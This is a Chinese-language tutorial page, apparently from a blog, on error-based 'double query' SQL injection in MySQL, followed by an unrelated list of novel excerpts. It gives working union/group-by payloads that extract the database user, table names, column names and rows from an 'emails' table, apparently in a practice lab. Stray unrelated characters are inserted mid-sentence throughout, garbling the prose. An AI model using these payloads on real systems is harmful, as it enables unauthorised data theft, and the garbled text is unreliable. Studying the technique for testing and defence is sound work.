SQL注入-雙注入

基礎SQL知識

雙查詢報錯注入需用到四個函數和一個group by語句:

group by ...?--->分組語句 //將查詢的結果分類匯總

rand()?--->隨機數生成函數

floor()?--->取整函數 //用來對生成的隨機數取整

concat()?--->連接字符串

count()?--->統計函數 //結合group by語句統計分組后的數據

雙注報錯原理在group by執(zhí)行原理蚪拦,group by 在執(zhí)行的時候會生成一張?zhí)摂M表廊镜,而group by后面的key就是這張表的主鍵

因為使用rand()*2作為排序條件,那么在查詢是生成的key為0跪妥,檢測虛擬表無重復漱牵,再插入的時候有生成1桐罕,插入表中時主鍵沖突就會報出錯誤宁否。并且表現為不一定是每次都報錯


1' union SELECT 1,2, count(1) from information_schema.schemata group by concat(floor(rand()*2),user())--+


圖-1

利用子查詢報出表名
1' union SELECT 1,2, count(1) from information_schema.schemata group by concat(floor(rand()*2),(select table_name from information_schema.tables where table_schema=database() limit 0,1))--+


圖-2


爆出列名
1' union SELECT 1,2, count(1) from information_schema.schemata group by concat(floor(rand()*2),(select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1))--+


圖-3

下載數據

1' union SELECT 1,2, count(1) from information_schema.schemata group by concat(floor(rand()*2),(select concat_ws("-",id,email_id) from emails limit 0,1))--+


圖-4
?著作權歸作者所有,轉載或內容合作請聯系作者
  • 序言:七十年代末缩麸,一起剝皮案震驚了整個濱河市铸磅,隨后出現的幾起案子,更是在濱河造成了極大的恐慌杭朱,老刑警劉巖阅仔,帶你破解...
    沈念sama閱讀 207,248評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現場離奇詭異弧械,居然都是意外死亡八酒,警方通過查閱死者的電腦和手機,發(fā)現死者居然都...
    沈念sama閱讀 88,681評論 2 381
  • 文/潘曉璐 我一進店門刃唐,熙熙樓的掌柜王于貴愁眉苦臉地迎上來羞迷,“玉大人界轩,你說我怎么就攤上這事∠挝停” “怎么了浊猾?”我有些...
    開封第一講書人閱讀 153,443評論 0 344
  • 文/不壞的土叔 我叫張陵,是天一觀的道長热鞍。 經常有香客問我葫慎,道長,這世上最難降的妖魔是什么薇宠? 我笑而不...
    開封第一講書人閱讀 55,475評論 1 279
  • 正文 為了忘掉前任偷办,我火速辦了婚禮,結果婚禮上澄港,老公的妹妹穿的比我還像新娘爽篷。我一直安慰自己,他們只是感情好慢睡,可當我...
    茶點故事閱讀 64,458評論 5 374
  • 文/花漫 我一把揭開白布逐工。 她就那樣靜靜地躺著,像睡著了一般漂辐。 火紅的嫁衣襯著肌膚如雪泪喊。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,185評論 1 284
  • 那天髓涯,我揣著相機與錄音袒啼,去河邊找鬼。 笑死纬纪,一個胖子當著我的面吹牛蚓再,可吹牛的內容都是我干的。 我是一名探鬼主播包各,決...
    沈念sama閱讀 38,451評論 3 401
  • 文/蒼蘭香墨 我猛地睜開眼摘仅,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了问畅?” 一聲冷哼從身側響起娃属,我...
    開封第一講書人閱讀 37,112評論 0 261
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎护姆,沒想到半個月后矾端,有當地人在樹林里發(fā)現了一具尸體,經...
    沈念sama閱讀 43,609評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡卵皂,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 36,083評論 2 325
  • 正文 我和宋清朗相戀三年秩铆,在試婚紗的時候發(fā)現自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片灯变。...
    茶點故事閱讀 38,163評論 1 334
  • 序言:一個原本活蹦亂跳的男人離奇死亡殴玛,死狀恐怖捅膘,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情族阅,我是刑警寧澤篓跛,帶...
    沈念sama閱讀 33,803評論 4 323
  • 正文 年R本政府宣布膝捞,位于F島的核電站坦刀,受9級特大地震影響,放射性物質發(fā)生泄漏蔬咬。R本人自食惡果不足惜鲤遥,卻給世界環(huán)境...
    茶點故事閱讀 39,357評論 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望林艘。 院中可真熱鬧盖奈,春花似錦、人聲如沸狐援。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,357評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽啥酱。三九已至爹凹,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間镶殷,已是汗流浹背禾酱。 一陣腳步聲響...
    開封第一講書人閱讀 31,590評論 1 261
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留绘趋,地道東北人颤陶。 一個月前我還...
    沈念sama閱讀 45,636評論 2 355
  • 正文 我出身青樓,卻偏偏與公主長得像陷遮,于是被迫代替她去往敵國和親滓走。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 42,925評論 2 344